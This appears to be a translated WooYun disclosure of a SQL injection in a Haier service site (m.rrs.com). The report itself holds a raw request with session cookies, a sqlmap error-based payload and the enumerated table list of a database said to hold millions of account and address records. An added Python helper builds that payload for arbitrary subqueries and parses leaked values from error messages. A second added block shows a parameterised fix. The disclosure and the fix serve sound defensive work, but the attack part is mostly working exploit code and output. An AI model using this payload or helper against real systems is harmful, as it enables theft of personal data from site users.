
Vulnerability Summary (followed by 24)

Defect ID: wooyun-2016-0209803

Title: SQL injection in a Haier Group system (3 million account records and 2 million address records)

Vendor: Haier Group (海尔集团)

Author: 路人甲

Submitted: 2016-05-18 06:12

Fix time: 2016-07-02 10:00

Published: 2016-07-02 10:00

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability Details

Disclosure status:

2016-05-18: Details reported to the vendor, awaiting vendor action
2016-05-18: Vendor confirmed; details visible to the vendor only
2016-05-28: Details opened to core white hats and domain experts
2016-06-07: Details opened to regular white hats
2016-06-17: Details opened to intern white hats
2016-07-02: Details opened to the public

Summary:

See title.

Details:

POST /snaplb/profile/getOthersMessageListForMobel HTTP/1.1
Content-Length: 178
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://m.rrs.com/
Cookie: JSESSIONID=A70D0B53354901BACB9BEFBF6866FE49; rrs.com_ehaier_sessionid=67682DA5C5ACB656F9F9F724D2EF1C6E; rrs.com_ehaier_refererUrl="aHR0cDovL20ucnJzLmNvbS8="; rrs.com_ehaier_loginReturnUrl="aHR0cDovL20ucnJzLmNvbS9zaHVpL21vYmlsZS9waW5nYW4="; RRSSESS=e7g34t86s7gkebgnsivfjeam91; laravel_session=eyJpdiI6IlFJVTZYV2FYZFwvckdzT3lhcWI1b1l3PT0iLCJ2YWx1ZSI6IjhENXdiUXp3V2h1RTlYWk1jbTFsRnlZaVNBZnBBOXZhdlwvNXFraTlLVnlrV3Zzc2dYejdqYlRDTWlsbGlIcU80aWIycGI2QnplSXJrQzlBSzRWQWduQT09IiwibWFjIjoiNmYyMzdiZTUzNzg3ZmZkZmNlZmRlMDQ0Y2QxNDQ1NWRmOGQwYzhlY2I5ZGQ3ZGI5ODI1NzBlZGM2NzFiZTFiYiJ9; JSESSIONID=A70D0B53354901BACB9BEFBF6866FE49; ZXKJSESSIONID=43735fe5-ef4a-e052-6670-2147048924e1; UniqueName=43735fe5-ef4a-e052-6670-2147048924e1; Hm_lvt_e1b611e8ea607634925d9684f4e559e5=1462826878,1462827087,1462827310,1462827460; Hm_lpvt_e1b611e8ea607634925d9684f4e559e5=1462827460; _jzqa=1.4547732553112906000.1462826785.1462826785.1462826785.1; _jzqc=1; _jzqx=1.1462826785.1462826785.1.jzqsr=acunetix-referrer%2Ecom|jzqct=/javascript:domxssexecutionsink(0,"'\"><xsstag>()refdxss").-; _jzqckmp=1; _jzqb=1.11.10.1462826785.1; _qzja=1.668047106.1462826784881.1462826784881.1462826784881.1462830158492.1462830163560.%257B%257B_USER__name%257D%257D.1.0.20.1; _qzjb=1.1462826784881.20.0.0.0; _qzjc=1; _qzjto=20.1.0; HMACCOUNT=7A72A504167B356C; BAIDUID=D80BD201682D349E65CF00516B739F4C:FG=1; _gsref_113428431=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); _gscu_113428431=628268849w7j6y11; _gscs_113428431=62826884n31uwd11|pv:2; _gscbrs_113428431=1; NTKF_T2D_CLIENTID=guest578715F5-7A49-1619-68E7-C0CA6B804B6F; nTalk_CACHE_DATA={uid:he_1000_ISME9754_guest578715F5-7A49-16,tid:1462826909284801,opd:1}; Hm_lvt_504222469397f794ea8da61f8a4e10e2=1462829913,1462830158,1462830164,1462830412; Hm_lpvt_504222469397f794ea8da61f8a4e10e2=1462830412; nTalk_PAGE_MANAGE={|m|:[{|02026|:|270020|}],|t|:|04:50:02|}; SERVERID=4b4a76f761b5f05d5ba1368c620770ae|1462895108|1462895108; 
avr_137032388_0_0_4294901760_271286987_0=1854756157_60071446; Hm_lvt_972125b56f85b5c6ce2c83fd9305649e=1462829558,1462829669,1462829683,1462829913; Hm_lpvt_972125b56f85b5c6ce2c83fd9305649e=1462829913; __xsptplus163=163.1.1462828448.1462829913.12%233%7Cwww.acunetix-referrer.com%7C%7C%7C%7C%23%235CBGDdxBfWnucW7rlM1gtDfyRlm8qHDR%23; zid=a5a3a470f97a661e2b635fb6b309c9af; _pzfxuvpc=1462828582822%7C1416075934140965094%7C11%7C1462829913491%7C1%7C%7C1200018089110423045; _pzfxsvpc=1200018089110423045%7C1462828582822%7C11%7Chttp%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22)
Host: m.rrs.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
currentPage=1&othersUserId=i&userId=anonymous

(Screenshot: 1.png)


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: othersUserId (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: currentPage=1&othersUserId=i' AND (SELECT 5804 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT (ELT(5804=5804,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'aBMj'='aBMj&userId=anonymous
---
back-end DBMS: MySQL 5.0
Database: snap_haier
[198 tables]
+---------------------------------------+
| activity_clean_code_data |
| area_data |
| area_data_bak |
| area_data_bak_13121101 |
| attachment |
| attitude_of_user_toward_object |
| attitude_statistics_toward_object |
| best_service_case |
| blog_attachment |
| blog_attachment_download_record |
| blog_comment |
| blog_excellent_record |
| blog_image |
| blog_lightblog |
| blog_lightblog_statistics |
| blog_like_record |
| blog_report_record |
| branch_record |
| city_data_weather |
| cms_base |
| cms_base_content_ref |
| cms_content |
| cms_content_top |
| code |
| comment_guide_info_pc |
| comment_guide_info_tbl |
| common_click_count |
| content_filter_word |
| credit_blog_record |
| credit_contribution_record |
| credit_record |
| credit_setting |
| daily_recommend |
| ds_business_oppo_et |
| ds_room_picture_et |
| ds_room_picture_et_copy |
| dynamic_image |
| faq_content |
| feed |
| feed_all_inbox |
| feed_followed_inbox |
| feed_followed_personal_inbox |
| feed_follower_personal_about_me_inbox |
| feed_follower_personal_inbox |
| feed_integrated_inbox |
| feed_topic_followed_inbox |
| feed_topic_inbox |
| feed_topic_personal_inbox |
| following_count |
| following_log |
| following_relation |
| gf_gift_receive_record_et |
| gift_packs |
| gift_packs_detail |
| gift_packs_user_ref |
| hot_lightblog_historical |
| hot_lightblog_monthly |
| hot_lightblog_weekly |
| interact_topic |
| interact_topic_category |
| interact_topic_comment |
| interact_topic_count |
| interact_topic_four_type |
| interact_topic_good |
| interact_topic_vote |
| invitation |
| invitation_authority |
| leave_message_tbl |
| lg_interface_invoke_et |
| lg_interface_invoke_ht |
| lg_job_et |
| login_record |
| ls_appraise_record_et |
| ls_appraise_record_ht |
| ls_workorder_et |
| ls_workorder_ht |
| ls_workorder_waiter_et |
| magnetic_stripe_table |
| monthly_top20_blogs |
| mytest |
| notification |
| notification_template |
| parameters_config |
| personal_setting_item |
| personal_setting_item_spec |
| personal_setting_value_spec |
| prize |
| product_failure |
| product_pic |
| product_register_record |
| recommendation |
| refered_user_recent_record |
| register_invitation_code |
| register_temporary_record |
| rel_wiki_hotkey |
| rel_wiki_one |
| sh_experience_comment_et |
| sh_experience_praise_et |
| sh_experience_recommend_et |
| sh_experience_recommend_ht |
| sh_experience_statistics_et |
| sh_free_comment_et |
| sh_haier_back_record |
| sh_user_win |
| sh_user_win_comment_et |
| sh_user_win_praise_et |
| share_stuff |
| share_stuff_comment |
| share_stuff_good |
| share_stuff_tags |
| social_assess_record |
| st_appraise_record |
| st_social_assess_record |
| st_workorder |
| star_shop_table |
| strainer_record |
| sys_data |
| sys_mode_info |
| tag |
| tag_map |
| template |
| test |
| tmp_ds_room_picture_et |
| tmp_ls_workorder_et_bak |
| tmp_sh_user_win |
| tmp_sys_mode_info |
| tmp_user_hits_hot |
| tmp_user_integral_details_all |
| tmp_userprofile |
| tmp_userprofile_bak |
| topic |
| topic_category |
| topic_reply_detail |
| topic_statistics |
| topic_statistics_of_user |
| topic_subscription_record |
| topic_visit_record |
| unit_base_data |
| unit_base_data_bak |
| unit_house_data |
| unit_house_data_bak |
| unit_house_data_bak_13121101 |
| unit_house_data_copy |
| unit_house_temp |
| unit_shop_data |
| up_city_info |
| up_codelist |
| up_province_et |
| up_province_et_copy |
| user_account |
| user_account_copy |
| user_address |
| user_address_for_act |
| user_area_record |
| user_authority |
| user_business_authority |
| user_daily_recommend |
| user_friends_tbl |
| user_goodskill_rt |
| user_goodskill_rt_bak |
| user_hits_hot |
| user_integral_details_all |
| user_integral_details_one |
| user_integral_grade |
| user_integral_prize |
| user_integral_source |
| user_refer_record |
| user_regist_tbl |
| user_related_policy |
| userprofile |
| userprofile_achievement |
| userprofile_bak |
| userprofile_complete_degree |
| userprofile_education_experience |
| userprofile_obtain_phone_record |
| userprofile_project_experience |
| userprofile_project_experience_detail |
| userprofile_skill_support_record |
| userprofile_skill_support_statistics |
| userprofile_statistics |
| userprofile_training_experience |
| userprofile_work_experience |
| value_added_products |
| visit |
| vote |
| vote_detail |
| vote_option |
| vote_result |
| water_purifier |
| web_click_count |
| web_click_uv_count |
| wiki_base |
| wiki_base_content_ref |
| wiki_content |
| wiki_content_top |
| winning_info |
| world_cup_activity_tbl |
| world_cup_support_num |
+---------------------------------------+
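The sqlmap payload above is the classic MySQL error-based technique: the value to exfiltrate is wrapped in two hex marker strings inside CONCAT(), and a GROUP BY over FLOOR(RAND(0)*2) forces a duplicate-key error whose message carries that string back to the client. The following is an added example, not part of the original report or of sqlmap: it rebuilds the page's payload from an arbitrary subquery, encodes the POST body from the report, and parses the marker-delimited value out of an error response. The sample responses are constructed for illustration; the page does not show what the application actually returned.

```python
import re
from urllib.parse import urlencode

# Marker strings from the sqlmap payload on this page:
# 0x71706b7171 = 'qpkqq', 0x71766a7871 = 'qvjxq'.  sqlmap brackets the
# extracted value with them so it can be found in whatever error text the
# application echoes back.
PREFIX = bytes.fromhex("71706b7171").decode()
SUFFIX = bytes.fromhex("71766a7871").decode()

# othersUserId value exactly as sqlmap reported it on this page.
REPORT_PAYLOAD = (
    "i' AND (SELECT 5804 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,"
    "(SELECT (ELT(5804=5804,1))),0x71766a7871,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'aBMj'='aBMj"
)


def hex_literal(s: str) -> str:
    """MySQL 0x... string literal, so no quote characters are needed inside CONCAT()."""
    return "0x" + s.encode().hex()


def error_based_payload(subquery: str, prefix: str = PREFIX, suffix: str = SUFFIX) -> str:
    """Build the MySQL >= 5.0 FLOOR(RAND(0)*2) duplicate-key payload around `subquery`.

    GROUP BY x evaluates the key expression once to look it up in the temporary
    table and again when inserting it.  RAND(0) is a fixed sequence whose
    FLOOR(*2) values start 0,1,1,0,1,1, so with three or more source rows the
    same key is produced twice and MySQL raises error 1062
    "Duplicate entry '...' for key 'group_key'".  The duplicate key is the
    CONCAT() result, i.e. prefix + subquery value + suffix + 0/1, so the
    subquery's value ends up verbatim in the error message.
    INFORMATION_SCHEMA.CHARACTER_SETS is simply a table with enough rows.
    """
    return (
        "i' AND (SELECT 5804 FROM(SELECT COUNT(*),CONCAT("
        f"{hex_literal(prefix)},({subquery}),{hex_literal(suffix)},"
        "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) "
        "AND 'aBMj'='aBMj"
    )


def form_body(payload: str) -> str:
    """The POST body from the report with the injected othersUserId value, URL-encoded."""
    return urlencode({"currentPage": "1", "othersUserId": payload, "userId": "anonymous"})


def extract_leaked(response_body: str, prefix: str = PREFIX, suffix: str = SUFFIX):
    """Return the text between the markers, or None if the response carries no leak.

    The trailing '1' that follows the suffix in the 1062 message is the
    FLOOR(RAND(0)*2) half of the group key, not part of the value.  MySQL
    truncates this message (64 characters on versions of that era), which is
    why sqlmap fetches long values in MID() slices rather than in one go.
    """
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), response_body, re.S)
    return m.group(1) if m else None


def injectable(response_body: str) -> bool:
    """sqlmap's confirmation probe: ELT(5804=5804,1) evaluates to '1' only if the
    injected expression ran, so the markers must bracket exactly '1'."""
    return extract_leaked(response_body) == "1"


# Constructed sample responses (not captured from the target): the raw MySQL
# 1062 text for the probe payload and for a `SELECT database()` payload.
SAMPLE_PROBE_RESPONSE = "Duplicate entry 'qpkqq1qvjxq1' for key 'group_key'"
SAMPLE_DATA_RESPONSE = "Duplicate entry 'qpkqqsnap_haierqvjxq1' for key 'group_key'"


if __name__ == "__main__":
    assert error_based_payload("SELECT (ELT(5804=5804,1))") == REPORT_PAYLOAD
    print(form_body(error_based_payload("SELECT database()")))
    print("injectable:", injectable(SAMPLE_PROBE_RESPONSE))
    print("leaked:", extract_leaked(SAMPLE_DATA_RESPONSE))
```

Because the only thing that reaches the attacker is whatever error text the endpoint reflects, the technique depends on two server-side defects at once: the unescaped parameter and the verbose error page. Removing either one stops this particular sqlmap technique, though only the first actually fixes the injection.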


3 million account records:

(Screenshot: 2.png)


2 million address records:

(Screenshot: 3.png)

Proof of vulnerability:

Fix recommendation:
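The report leaves the fix section empty. As an added illustration (not the vendor's fix, and not code from the affected site, which runs a Java stack), the following contrasts the two server-side behaviours the injection above relied on with their corrected forms: the parameter spliced into SQL text and the raw database error echoed to the client, versus a bound parameter, an allow-list on the identifier shape, and a generic error response. The table and column names are assumptions, and the rows are constructed sample data; sqlite3 stands in for MySQL since it ships with Python.

```python
import re
import sqlite3

# Constructed sample rows standing in for the snap_haier userprofile table
# (assumed column names; the real schema is not on the page).
SAMPLE_ROWS = [
    ("alice", "138****0001"),
    ("bob", "139****0002"),
    ("carol", "137****0003"),
]

# The othersUserId value from the report, used here only as an input to test against.
REPORT_PAYLOAD = (
    "i' AND (SELECT 5804 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,"
    "(SELECT (ELT(5804=5804,1))),0x71766a7871,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'aBMj'='aBMj"
)

SQL_SELECT = "SELECT user_id, phone FROM userprofile WHERE user_id = "


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userprofile (user_id TEXT PRIMARY KEY, phone TEXT)")
    conn.executemany("INSERT INTO userprofile VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def handler_vulnerable(conn: sqlite3.Connection, others_user_id: str) -> dict:
    """Both defects error-based injection needs: the parameter is concatenated
    into the SQL text, and the DBMS error message is returned to the caller."""
    sql = f"{SQL_SELECT}'{others_user_id}'"
    try:
        return {"rows": conn.execute(sql).fetchall()}
    except sqlite3.Error as e:
        # e.g. "no such table: INFORMATION_SCHEMA.CHARACTER_SETS" goes straight
        # to the client; on MySQL this is where the 1062 duplicate-entry leak lives.
        return {"error": str(e)}


def query_fixed(conn: sqlite3.Connection, others_user_id: str) -> list:
    """Bound parameter: the value travels as data and is never parsed as SQL,
    so quotes and keywords in it are compared literally against user_id."""
    return conn.execute(f"{SQL_SELECT}?", (others_user_id,)).fetchall()


# Shape of a legitimate user identifier (assumed for this example).
USER_ID_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def handler_fixed(conn: sqlite3.Connection, others_user_id: str) -> dict:
    """Defence in depth: allow-list the input shape, bind the parameter, and
    return only a generic error so the database cannot be used as an oracle."""
    if not USER_ID_RE.fullmatch(others_user_id):
        return {"error": "invalid othersUserId"}
    try:
        return {"rows": query_fixed(conn, others_user_id)}
    except sqlite3.Error:
        # Log the real exception server-side; never reflect it.
        return {"error": "internal error"}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", handler_vulnerable(db, "i' OR '1'='1"))
    print("vulnerable, report payload:", handler_vulnerable(db, REPORT_PAYLOAD))
    print("fixed, tautology:", handler_fixed(db, "i' OR '1'='1"))
    print("fixed, legit id:", handler_fixed(db, "alice"))
```

The parameter binding alone is what closes the injection; the allow-list and the generic error message are there so that a future concatenation bug elsewhere in the same endpoint does not immediately hand an attacker a working error-based oracle again.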

Copyright: when reposting, please credit the source, 路人甲@乌云 (WooYun)


Vendor Response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2016-05-18 09:51

Vendor reply:

Thanks to the white hat for the testing and the heads-up; staff have been assigned to fix it.

Latest status:

None


Comments:

  1. 2016-05-18 06:19 | diguoji ( Regular white hat | Rank:505 Vulns:122 | Changchun, Jilin, China; scored 230 on the gaokao; now farming at home. )

    The reviewers are up early.

  2. 2016-05-18 08:30 | Dotaer ( Passer-by | Rank:28 Vulns:8 | Study more, dig more bugs! )

    @diguoji That gave you away as the submitter at a glance.

  3. 2016-05-18 08:32 | diguoji ( Regular white hat | Rank:505 Vulns:122 | Changchun, Jilin, China; scored 230 on the gaokao; now farming at home. )

    @Dotaer NO NO NO, it really isn't me.

  4. 2016-05-18 09:02 | Dotaer ( Passer-by | Rank:28 Vulns:8 | Study more, dig more bugs! )

    @diguoji Explaining is just covering up.